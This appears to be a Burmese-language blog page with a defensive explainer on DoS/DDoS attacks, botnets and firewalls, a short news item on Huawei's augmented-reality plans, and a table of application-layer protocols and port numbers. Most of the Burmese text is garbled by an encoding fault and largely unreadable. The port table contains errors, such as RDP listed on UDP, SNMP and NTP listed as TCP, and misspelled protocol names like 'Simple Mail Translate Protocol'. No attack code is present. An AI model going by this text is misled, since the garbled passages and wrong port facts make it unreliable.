DoS or DDoS attack αုိαα္αုိαာαြα္ααဲ αုိαာαေαာ့ αာႏႈα္းαΏαα့္αာαြα္ႏုိα္αဲα αα္းαα္းαုိ αေαြαေαးαါαူး။ αါေααဲα ေαာα္းαြα္αဲααα္းαα္းαα ္α်ဳိαေαာ့αွိαါ αα္...
* α‘αΏαဲαα္းαိαိαဲα anti virus program αုိ update αုα္ေαးαါ
* Firewall α‘ားαွα္αα္၍ αα္းαΎαα္ေαာ rule α်ားαα္αွα္αါ...
* αိαိαြα္α်ဴαာαွာ ααုိα‘α္αဲα Intenet Port Number ေαြαိုαိα္αါ.. αြα္α်ဴαာαဲα Port αုိα α ္αα္http://www.auditmypc.com/firewall-test.asp
* Email α‘ား α αα ္αα ္α်α‘αုံးαΏαဳαါ... mail filtering αုိα‘αုံးαΏαဳαါ...
αီα‘αြα္ α‘αိα α‘ေααဲααေαာ့ Firewall αုိαα္αΏαီးေαΏαာαါαα္.. Firewall αွာ Hardware Firewall αဲα Software Firewall αုိαΏαီးαွိαါαα္...
Hardware Firewall
αါαုိ Network Firewall αုိααα္းေαααΏαီး αေααေαα္ ေαာα္αုံးေαα ADSL Router ေαြαွာ αα ္αါαα္းαြဲαΏαီးαါαာαα္αါαα္... Coporate αုα္αα္းေαြαုိαα္ေαာ့ Firewall Router αα ္αုαုိ αီးαα္ααα္αΏαီး αα္αားαα္αΎααါαα္... Software Firewall αα္α ာαα္ Hardware Firewall ααုိαΏαီးေαာα္းαြα္αါαα္..
ေαာα္αα ္αုα αါαေαာ့ DoS or DDoS ေαြαုိ αာαြα္αုိα ေαာα္းαြα္αဲα Server αြဲαα α္းαႈαα ္αုαါαဲ... α‘αဲαွာ Hardware Firewall α‘αΏαα္ Load Balancer αုိαာαုိαါαα့္αားαါ αα္...
Load Balancer αုိαΏααားαာαါ...
α‘ားαုံးαုိ α‘α်α₯္းα်ဳα္αΏαီးေαΏαာααα္αုိαα္ DoS αုိαာ Attacker αေα Victim αုိ αုိα္αုိα္αုိα္αုိα္αα္.. DDoS αုိαာαေαာ့ αΎαားαံ Zombie αုိေαြးαΏαီး αုိα္αုိα္ αα္... αီေαာα္αါαဲ...
Zombie & Botnet
Zombies αုိαာ αα္αာαဲα α‘αုံးα်αံαα ္αုαΏαα ္αΏαီး Victim αုိ αα္αာαဲα αုိα္းေα α်α္α‘αုိα္း αုိα္αုိα္ααာαΏαα ္αါαα္.. αါေαΎαာα့္ Zombie ααα္αုိαာ malware ααာαုိααုိႏုိα္αါαα္.. Malware (zombie) ααားαဲα αြα္α်ဴαာαာ
* Sending spam
* Hack other computers
* Denial of service attacks
* Advertisement click fraud
* Phishing websites
α αα္αုိααုိαုα္ေαာα္αΎααါαα္..
αα္း Malware, trojan, virus αာ α‘αုံးα်αံαြα္α်ဴαာα‘αြα္းαα္ေαာα္αΏαီး α‘αဲαွာαွိαဲα Security ေαြ၊ Antivirus ေαြαုိ αိα္αာ Hacker α‘ေααဲα Additional Programေαြ αα့္αြα္းαုိααေα‘ာα္၊ αα္αြα္αုိααေα‘ာα္ αα္းαြα့္ေαးαါαα္... αီေαာ့ αα္း αြα္α်ဴαာα Hacker αဲα α‘αုံးα်αံαုံးαုံးαΏαα ္αΏαီး αုိα‘α္αဲαα‘αါ α‘αုံးαΏαဳαုိααေα‘ာα္ Hacker ေαြα αα္း Zombie ေαးေαြαုိ α ုαားαα္αါαα္... αါαုိ botnet αုိαေαααုိႏုိα္αါαα္.. bot αုိαဲαα‘αိααΈါα္ααα္း Robot αုိ Artificial Intelligence ေαါα... α‘αုαုိ Trojan ေαြα်ားαာαဲααα္ ေα αုိαာေα αုိα္းαုိαααါαΏαီ... αα္αာေαြα Zombie ေαြαုံးαΏαီးαုိα္αုိα္αုိα္ေαာ့ αူαုိααုိ αုိα္αံ Trace αုိα္ααာ αα္αြားαာ ေαါα...
αိαိα α္α Zombie αΏαα ္ေααΏαီαုိαα္ေαာ့
α။ αိαိ RUN αုိα္αဲα programs ေαြα ေႏွးαာαα္။
α။ services ေαြ (α₯ααာ http) high rate α်αာαα္။
α။ α်ားαΏαားαွေαာ connection requests ေαြαာ αြဲαΏαားαဲα Networks ေαြαေα αα္αာαα္။
α။ αိαိαဲα site αုိαာေαာα္α‘αုံးαΏαဳαူေαြα site αုိ α‘αုံးαΏαဳαဲα ေααာαွာ ေႏွးαα္။
α ။ αိαိαဲα α α္αာ CPU load αΏαα့္ေααိα့္αα္။
#C_M_H
Sunday, November 18, 2018
αာαα့္ α ႏွα ္α‘αြα္းαြα္ AR α αα္α်α္αွα္ αုα္αုα္αာαα့္ Huawei
αα္းααာေαာααα
္αုαံုး AR αုိα α်ီαα္α်α္αွိαါαα္။ α‘αူးαျαα့္ αိα္αီးαα္းααာαုααΈαီα်ားα α
αα္αုα္းေαα္αုα္αံုးαΏαီး AR α
αα္α်α္αွα္ αေαα္αြα္းαာαα္αုိα αံုαΎαα္ေααΎααါαα္။ AR αုα္ေαာα္ေααဲ့ αုααΈαီေαြαဲαွာ Huawei αα္း αါαα္αါαα္။ Huawei αာ Mate 20 Pro αွာ AI ႏွα့္ AR αိုα αα့္αြα္းαားαါαα္။ Huawei ααα္း α
αα္αုα္းေαာααွာαဲ ေαα်α္αဲ့ αုααΈαီα်ဳိးααုα္αါαူး။ R&D α‘αြα္ ေαြေαΎαးαီαီαα္ေαါα္းα်ားα
ြာ αံုးေααဲ့ αုααΈαီαီαီ Huawei αာ αာαα့္ႏွα
္α‘αα္းαα္α‘αြα္းαွာ AR α
αα္αာαီ αုα္αုα္ ေαာα္းα်αိုα α
ီα
α₯္αားαါαα္။
CNBC ႏွα့္α‘α္αာα်ဴးαွာ Huawei CEO αα
္α်α္αူα AR α
αα္α်α္αွα္αုα္αုα္ ေαာα္းα်αုိα αုα္ေαာα္ေααΏαီ ျαα
္αΏαီး ႏွα
္α‘αα္းαα္α‘αြα္းαွာ ေα
်းαြα္αွာ ေαာα္းα်αိုα α‘αα္αα့္ျαα
္αာαွာ ျαα
္ေαΎαာα္း ေျαာαΎαားαြားαါαα္။
Huawei αဲα AR α
αα္α်α္αွα္ααα္း Google ႏွα့္ Microsoft αိုααဲα AR α
αα္α်α္αွα္α်ားαုိαဲ αုα္ေαာα္αာαွာ ျαα
္αါαα္။ αါေααα့္ Huawei αဲα α
αα္α်α္αွα္α Google αဲα Microsoft αိုααဲα α
αα္α်α္αွα္αα္ αုိαΏαီးေαာ့ α‘αα့္ျαα့္αာαုိα αွိαါαα္။ Huawei αဲα α
αα္α်α္αွα္α αုိαΏαီးေαာ့ α‘αံုးαα့္αာαုိα ေαα်ာေααါαα္။
αα္αα္αΏαီး αα
္α်α္αူα αα္αွိα‘α်ိα္αွာ AR ေαာαα α
αα္αံုαွ်αာ αွိေαေαးေαာ္αα္း α‘αာαα္αွာ α်ားα
ြာ α‘αံုးαα့္αာαα့္α
αα
္ ျαα
္ေαΎαာα္း αိုαြားαါαα္။
ααα္ေαာ့ AR ေα
်းαြα္α αျαα္းျαα္းααီးαြားαာαုိα ေαα်ာေααါαα္။ Apple ααα္း AR α‘αြα္ α‘ααီးα‘α်α္ αုα္ေαာα္ေααါαα္။ Apple αာ Akonia Holographic αုိ αα္αူαားααုိ Facebook ααα္း AR α
αα္α်α္αွα္ αုα္ေαာα္ေααာ αΎαာျαα့္αΏαီ ျαα
္αါαα္။
αα½ြα္းα်α္αူα်ားα αααα αုႏွα
္αွာ AR α
αα္α်α္αွα္ ေα
်းαြα္αွာ αα αα္းα‘αိ ျαα့္αα္αာαα္αုိα αα္ααွα္းαားαΎααါαα္။
Thursday, November 8, 2018
Application Layer
November 08, 2018
No comments
ေα့αာαွα္αား αα္းααာα‘ေျαာα္းα်ား
Application Layer α‘ေျαာα္းα‘αိုေαာα္α‘αုံးα‘ႏႈα္းα်ား ႏွα့္ α ာα ုα‘ျαα့္α‘α ုံα်ား αိ့αွိေα αα္
HTTP - Hypertext Transfer Protocol
(Port No: - 80/TCP)
HTTPS - Hyperext Transfer Protocol Secure (Port No: - 443/TCP)
TELNET- Terminal Network
(Port No:- 23/TCP)
SSH - Secure shell
(Port No:- 22/TCP)
FTP - File Transfer Protocol
(Port No:- 20/21/TCP)
RDP - Remote Desktop Protocol
(Port No:- 3389/UDP)
TFTP - Trivial File Transfer Protocol
(port No:- 69/UDP)
DHCP - Dynamic Host Configuration Protocol (Port No:- 67/68/UDP)
DNS- Domain Name service
(Port No- 53/TCP/UDP)
SNMP- Simple Network Management Protocol (Port No:- 161/162/TCP)
SMTP- Simple Mail Translate Protocol
(Port No:- 25/TCP)
POP3:- Port Office Protocol
(Port No:- 110/TCP)
IMAP- Internet Massage Access Protocol (Port No:- 143/TCP)
NTP- Network Time Protocol
(Port No:- 123/TCP)
LDAP- Light Wight Directory Access Protocol (Port No:- 389/TCP)
ααၤαာα‘ေαါα္းႏွα့္ျαα့္α ုံျααါေα αα္ေαာα္ေα့αာ αိα္ααာ α်α္းαာαိုα္α ိα္ျαဲαါေα
#ေαာα္αါး
Subscribe to:
Comments (Atom)








